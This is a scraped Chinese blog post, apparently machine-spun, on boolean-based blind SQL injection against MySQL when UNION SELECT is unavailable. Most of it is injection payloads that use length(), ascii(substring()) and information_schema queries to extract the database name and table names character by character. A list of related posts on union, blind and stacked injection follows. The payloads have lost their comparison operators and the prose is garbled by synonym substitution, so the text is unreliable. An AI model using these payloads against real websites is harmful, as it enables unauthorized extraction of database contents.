mysql 不支撑union select 的盲注方式

猜解数据库长度

and Length((database())) 10 //小于12返回正常阐明数据库是12位以下

and length((database())) 8 //小于8返回过错解释数据库名是9位的

猜解数据库名

and ascii(substring((database()),1,1))100 //100的ascii码d,说明不是d

and ascii(substring((database()),1,1))122 //122存在说明数据库名第一位是z

and ascii(substring((database()),2,1))114 返回错误说明不是ascii码114r 说明第二位不是r

and ascii(substring((database()),2,1))115 返回正常说明第二位是s

.....

猜表

and Length((SELECT distinct table_name FROM information_schema.tables Where table_schema0x7A73323236315F6462 limit 0,1)) 10 #小于8返回畸形表现表小于10

and Length((SELECT distinct table_name FROM information_schema.tables Where table_schema0x7A73323236315F6462 limit 0,1)) 9 #大于9返回毛病,表示值是9或8...

ascii码表参考:

apps.hi.baidu./share/detail/16685682

阅读(408) | 评论(1) | 转发(0) |

0

上一篇:没有了

下一篇:没有了

mysql支撑union_mysql 不支撑union select 的盲注方式相关推荐

  1. 注入学习(3) Mysql+php注入 基于bool和时间的盲注

    练习三:Mysql+php 基于bool和时间的盲注 今天要用的函数(详细的直接看链接): left()函数:left()得到字符串左部指定个数的字符 left( string, n ) #strin ...

  2. mysql join union_MySQL中union和join语句使用区别的辨析教程

    union和join是需要联合多张表时常见的关联词,具体概念我就不说了,想知道上网查就行,因为我也记不准确. 先说差别:union对两张表的操作是合并数据条数,等于是纵向的,要求是两张表字段必须是相同 ...

  3. mysql 多列union_Mysql联合查询UNION和UNION ALL的使用介绍

    一.UNION和UNION ALL的作用和语法 UNION 用于合并两个或多个 SELECT 语句的结果集,并消去表中任何重复行. UNION 内部的 SELECT 语句必须拥有相同数量的列,列也必须 ...

  4. sql注入-union select

    什么是SQL注入 SQL注入(Sql Injection ) 是一种将SQL语句插入或添加到应用(用户)的输入参数中的攻击 这些参数传递给后台的SQL数据库服务器加以解析并执行 哪里存在SQL注入? ...

  5. mysql 堆叠查询_SQL 注入方法 - 盲注、报错注入、UNION查询注入与堆叠注入

    盲注 关键点是 根据页面返回内容分析 Payload 中的问题是否为真,然后通过多次测试遍历出想要的数据 布尔盲注 目标地址:http://newspaper.com/items.php?id=2 对 ...

  6. LeetCode MySQL 1264. 页面推荐(union)

    文章目录 1. 题目 2. 解题 1. 题目 朋友关系列表: Friendship +---------------+---------+ | Column Name | Type | +------ ...

  7. MySQL入门 (四) : JOIN 与UNION 查询

    1 使用多个表格 在「world」资料库的「country」表格中,储存世界上所有的国家资料,其中有一个栏位「Capital」用来储存首都资料,不过它只是储存一个编号:另外在「city」表格中,储存世 ...

  8. mysql叠加select,MySQL – 有效地将两个select语句组合成一个...

    您可以将多个查询与UNION组合,但前提是查询具有相同的列数.理想情况下,列不仅在数据类型中,而且在于它们的语义含义;但是,MySQL并不关心语义,并且会通过强制转换为更通用的东西来处理不同的数据类型 ...

  9. MySql基础篇---002 SQL之SELECT使用篇: 基本的SELECT语句,运算符,排序与分页,多表查询,单行函数,聚合函数,子查询

    第03章_基本的SELECT语句 讲师:尚硅谷-宋红康(江湖人称:康师傅) 官网:http://www.atguigu.com 1. SQL概述 1.1 SQL背景知识 1946 年,世界上第一台电脑 ...

最新文章

  1. 瘫痪小姐姐“自主”行走视频火了,曾借助轮椅完成舞蹈表演,网友:灵魂是战士...
  2. hdu1879 继续畅通工程 最小生成树
  3. 学长毕业日记 :本科毕业论文写成博士论文的神操作20170411
  4. 黄聪:pjax使用心得总结
  5. 安全模式下修复电脑故障
  6. 高级PHP应用程序漏洞审核技术
  7. ios java 加密_AES加密 - iOS与Java的同步实现
  8. nvm切换node版本的命令
  9. Python内置四大数据结构之字典的介绍及实践案例
  10. chaincode java_基于Hyperledger Fabric交易系统帐户的钱包模型的java Chaincode实例
  11. 权重计算方法一:层次分析法(AHP)
  12. 计算机算法设计与分析 第5版 (王晓东) 课后答案[解析]
  13. 幼儿园趣味舞蹈课教案
  14. ipad编写python_ipad怎么写python
  15. css clac计算属性
  16. IAP程序升级(全网最全)
  17. 计算机等级考试陕西省考点名单及报考指南
  18. Small Talk Matters【闲谈很重要】
  19. 世界各国英文简写代码
  20. jstack: Java占用高CPU分析之- C2 Compiler Thread

热门文章

  1. select into from 与 insert into select 区别鉴赏
  2. 基于机器学习的捡球机器人设计与实现(探索)第4篇——电机驱动板选择(2019-03-02)
  3. 雅马哈发电机换机油教程_奥迪老A4B7 EA113 1.8T发动机严重烧机油大修彻底解决
  4. 返回1到n的所有组合python_如何在Python中生成0-1矩阵的所有可能组合?
  5. Kubernetes1.5新特性(一):Kubelet API增加认证和授权能力
  6. 深入理解JVM-垃圾回收器
  7. SpringCloud(第 003 篇)服务发现服务端EurekaServer微服务
  8. 一位资深Java的阿里系公司实战面试经验,套路还是面试官的多
  9. API网关Kong系列(一)初识
  10. Go实战--也许最快的Go语言Web框架kataras/iris初识二(TOML、Cache、Cookie)